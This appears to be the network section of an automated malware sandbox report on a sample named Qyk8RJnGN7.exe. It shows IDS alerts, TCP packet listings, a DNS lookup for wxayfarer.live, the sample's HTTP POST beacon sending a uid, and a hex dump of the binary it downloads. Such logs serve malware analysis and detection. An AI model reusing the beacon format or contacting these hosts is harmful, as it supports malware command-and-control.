2025-03-25T08:16:47.123472+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49685 | 104.21.112.1 | 443 | TCP
2025-03-25T08:16:48.152559+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49686 | 104.21.112.1 | 443 | TCP
2025-03-25T08:16:49.680318+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49687 | 104.21.112.1 | 443 | TCP
                                                            • Total Packets: 103
                                                            • 443 (HTTPS)
                                                            • 80 (HTTP)
                                                            • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2025 08:16:40.835187912 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:40.835247040 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:40.835316896 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:40.870919943 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:40.870940924 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.089776039 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.089874983 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.118350029 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.118379116 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.118942976 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.162763119 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.222449064 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.222477913 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.222635031 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683051109 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683176041 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683233023 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.683274031 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683358908 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683403969 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.683413029 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683520079 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683554888 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.683562994 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683655977 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683700085 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.683707952 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683804989 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.683851004 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.683859110 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.725246906 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.725271940 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.772126913 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.790311098 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.790488005 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.790551901 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.790575981 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791157007 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791205883 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.791214943 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791333914 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791377068 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.791383982 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791578054 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791621923 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.791629076 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791737080 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791779041 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.791785955 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791891098 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.791934013 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.791940928 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792037010 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792092085 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.792098999 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792206049 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792249918 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.792257071 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792444944 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.792494059 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.903515100 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.903561115 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:41.903575897 CET | 49681 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:41.903583050 CET | 443 | 49681 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.611037970 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.611083031 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.611182928 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.611572027 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.611583948 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.812273026 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.812374115 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.815562010 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.815577030 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.816010952 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:42.818238974 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.818695068 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:42.818742990 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.369568110 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.369867086 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.369968891 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.370007992 CET | 49682 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.370023966 CET | 443 | 49682 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.756933928 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.756984949 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.757086039 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.757438898 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.757453918 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.964236021 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.964392900 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.966113091 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.966124058 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.966435909 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.967936039 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.968144894 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:43.968179941 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:43.968230963 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.008342981 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:44.455846071 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:44.456067085 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:44.456146002 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.457310915 CET | 49683 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.457329988 CET | 443 | 49683 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:44.809952974 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.810005903 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:44.810091019 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.810450077 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:44.810466051 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.016007900 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.016094923 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.017623901 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.017637014 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.017883062 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.019104004 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.019284010 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.019315004 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.019371033 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.019381046 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.581334114 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.581490040 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:45.581581116 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.581773996 CET | 49684 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:45.581796885 CET | 443 | 49684 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:46.921706915 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:46.921763897 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:46.921838045 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:46.922210932 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:46.922229052 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.123317003 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.123471975 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.124902964 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.124917030 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.125164032 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.126590967 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.126802921 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.126832008 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.486116886 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.486404896 CET | 443 | 49685 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.486407995 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.486465931 CET | 49685 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.940716982 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.940798998 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:47.940903902 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.941371918 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:47.941392899 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.152360916 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.152559042 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.154073000 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.154086113 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.154464006 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.155833960 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.156645060 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.156677008 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.156781912 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.156816006 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
Mar 25, 2025 08:16:48.156939030 CET | 49686 | 443 | 192.168.2.7 | 104.21.112.1
Mar 25, 2025 08:16:48.156958103 CET | 443 | 49686 | 104.21.112.1 | 192.168.2.7
                                                            Mar 25, 2025 08:16:48.157099962 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157124996 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157293081 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157315969 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157481909 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157501936 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157514095 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157525063 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157670975 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157691002 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157712936 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157850981 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157875061 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204330921 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.204750061 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204804897 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204833984 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.248341084 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.248480082 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.254800081 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442689896 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442801952 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442950010 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.443330050 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.443346024 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.479619026 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.479669094 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.479753971 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.480149031 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.480165005 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.680216074 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.680318117 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.682045937 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.682073116 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.682310104 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.683615923 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.683649063 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.683696032 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226802111 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226870060 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226933956 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227140903 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227169037 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.227181911 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227190018 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.231693029 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:51.240963936 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:53.240995884 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:57.240966082 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:17:05.241173029 CET4968880192.168.2.7176.113.115.7
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 25, 2025 08:16:40.695981979 CET  52076        53         192.168.2.7  1.1.1.1
Mar 25, 2025 08:16:40.812167883 CET  53           52076      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Mar 25, 2025 08:16:40.695981979 CET  192.168.2.7  1.1.1.1  0x43bf    Standard query (0)  wxayfarer.live  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address       Type            Class        DNS over HTTPS
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.112.1  A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.16.1   A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.64.1   A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.80.1   A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.32.1   A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.96.1   A (IP address)  IN (0x0001)  false
Mar 25, 2025 08:16:40.812167883 CET  1.1.1.1    192.168.2.7  0x43bf    No error (0)  wxayfarer.live         104.21.48.1   A (IP address)  IN (0x0001)  false

• wxayfarer.live
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49681        104.21.112.1    443               6940  C:\Users\user\Desktop\Qyk8RJnGN7.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-25 07:16:41 UTC  265                OUT        POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 51
Host: wxayfarer.live
2025-03-25 07:16:41 UTC  51                 OUT        Data Raw: 75 69 64 3d 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 26 63 69 64 3d
Data Ascii: uid=db98bb430160fb366da61dc7445589178b6c4ac86d&cid=
2025-03-25 07:16:41 UTC  786                IN         HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 07:16:41 GMT
Content-Type: application/octet-stream
Content-Length: 34161
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5t335R6KlJKw4si0In4li0U1OpuabOQtQYCYE8sJ4gs69Q%2BmxK9CYuYyP84FT0A7yvTH0dn3puSVNaOhO7vf8b%2FQf445mUhVBzDknYhIMf3SI7jkr5v%2FygsZYi5xlik3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925c9fcde8724283-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=99103&min_rtt=98528&rtt_var=21339&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=952&delivery_rate=37785&cwnd=244&unsent_bytes=0&cid=d79b1182b4867e08&ts=612&x=0"
                                                            2025-03-25 07:16:41 UTC583INData Raw: 77 41 b7 36 fb 4f 53 72 a1 b5 3a 48 92 ef cf bb 84 68 dc 30 69 c4 29 2c ef af 02 61 51 cf 8c 00 73 26 a1 ad 37 bd b7 07 f1 bc 66 d0 e7 ae 54 df 18 d9 79 6d d0 44 66 c6 7a 81 f8 de 5b d2 72 b1 a9 89 2b 3e 60 af 3b d5 c8 32 be c5 19 f2 ac 38 88 65 36 e8 8d 23 c7 69 f9 26 d8 d2 35 88 0d a6 02 2c 15 27 46 22 6c e3 9f a8 df 0f 65 71 80 e5 d1 6a d9 71 34 69 b1 ee eb 36 36 e8 09 66 f6 0f 6e f2 e8 00 27 61 a7 32 ba 64 c4 05 97 8e e3 a8 5e ed aa eb 8d 0e fa 95 42 6a f2 c8 19 87 97 50 56 54 63 41 3c 8b 04 2a 83 dc 20 e3 82 27 55 9c 07 74 13 90 f8 7f b1 31 a4 72 4b 23 f3 d4 dc 96 3d 61 42 79 40 5d b9 ab e5 a5 01 c0 d2 d8 a3 2f 78 45 d2 f6 1b f6 db b7 e4 7d f5 b3 ec e0 2d 7d 20 49 a5 63 fd 72 25 9d 41 64 f7 d7 5b d0 fd f4 fa 46 54 3f 59 2d 8b b8 9b d9 07 a6 11 34 07
                                                            Data Ascii: wA6OSr:Hh0i),aQs&7fTymDfz[r+>`;28e6#i&5,'F"leqjq4i66fn'a2d^BjPVTcA<* 'Ut1rK#=aBy@]/xE}-} Icr%Ad[FT?Y-4
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 9c 73 67 6f 76 85 f5 d8 b6 a0 20 b4 7c 42 0d c5 5d 44 02 60 07 ca f3 08 56 9a 02 8d b5 46 37 13 61 71 db bb ac e0 08 a5 2b 7e 0b 5c a5 42 2e 58 f0 64 ad 45 4f 41 9d a9 ae 2e 9c 36 b8 12 a0 97 98 5c 83 2b d7 34 68 9f d4 82 3c ea 9d 19 09 51 61 69 e7 d4 ec b0 bf 35 ce 41 01 96 a0 40 32 3a b9 97 10 8d db 6c 2a 55 22 8e 0f 79 1f e7 1a 97 81 49 16 73 ef 6b f0 50 39 2d fb c4 fe 30 dd ad e9 ec 05 72 9e f7 83 49 ff eb c4 58 59 23 d2 2f be 68 cd 3e a1 20 06 83 62 ac 28 f8 1f 8d 02 62 11 ab 86 5d a1 44 fa 01 a2 22 e4 80 91 3b 0e f3 75 dd 0e 08 8b 9a 02 9c 89 89 a9 c0 2e a9 34 78 2c 4c 9b a5 66 57 b3 15 df 15 93 32 da 0e f1 fb 99 e5 3e e5 cc 2b 11 30 ca 30 8e 34 d7 28 04 39 3d 5f 01 71 c2 9a 77 af dc 2a fc e6 57 bc 4e 43 74 db 4f 1a bd 39 8c 63 0f fa 4a a4 ab 88 ad
                                                            Data Ascii: sgov |B]D`VF7aq+~\B.XdEOA.6\+4h<Qai5A@2:l*U"yIskP9-0rIXY#/h> b(b]D";u.4x,LfW2>+004(9=_qw*WNCtO9cJ
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 27 44 61 e0 bc b4 17 6b 69 ee 72 d5 f3 d8 2f 52 1b 6f 41 b8 7d b3 8e c5 ea 4d e6 06 1c 08 b4 ac 29 76 27 b7 b2 6f b8 70 fc cb da bb 6a 64 be 6b ca cf 5d a5 9c 34 90 79 c7 4a 05 29 60 c4 4b 54 0e 96 df ae 6c d9 ce 59 81 6c 49 17 88 77 69 2a 18 4a 42 65 76 0d 9a d6 1e 9d a4 93 80 6d 86 34 46 ac 7d c5 7a 0c 49 51 f5 3d e9 b6 5b 5a a8 5c 54 66 cd 3b 77 a5 e2 be 02 1c a6 f5 86 bb ae 33 87 0a f9 73 a0 89 aa b4 57 cd e7 08 35 7e 16 54 87 d7 b6 0a a3 71 22 a7 20 94 0a c5 4c 94 d5 b6 ef ea af 96 83 f8 7e 1f 17 a3 2d 18 3e fd c0 70 72 2f b8 3d 41 82 d2 24 f2 5c 1c b7 13 b0 09 b6 ea 73 62 bd 23 d3 75 c4 73 68 ca cb 0f f4 ba ae 77 9f af d3 25 b7 c2 b1 e1 3f 5d f4 f5 6a 02 77 b0 f3 40 ce 6c a7 f3 f4 f2 76 70 79 aa e2 53 08 88 18 bf 53 0b 42 a6 2f 63 9f 26 fc 32 5e ef
                                                            Data Ascii: 'Dakir/RoA}M)v'opjdk]4yJ)`KTlYlIwi*JBevm4F}zIQ=[Z\Tf;w3sW5~Tq" L~->pr/=A$\sb#ushw%?]jw@lvpySSB/c&2^
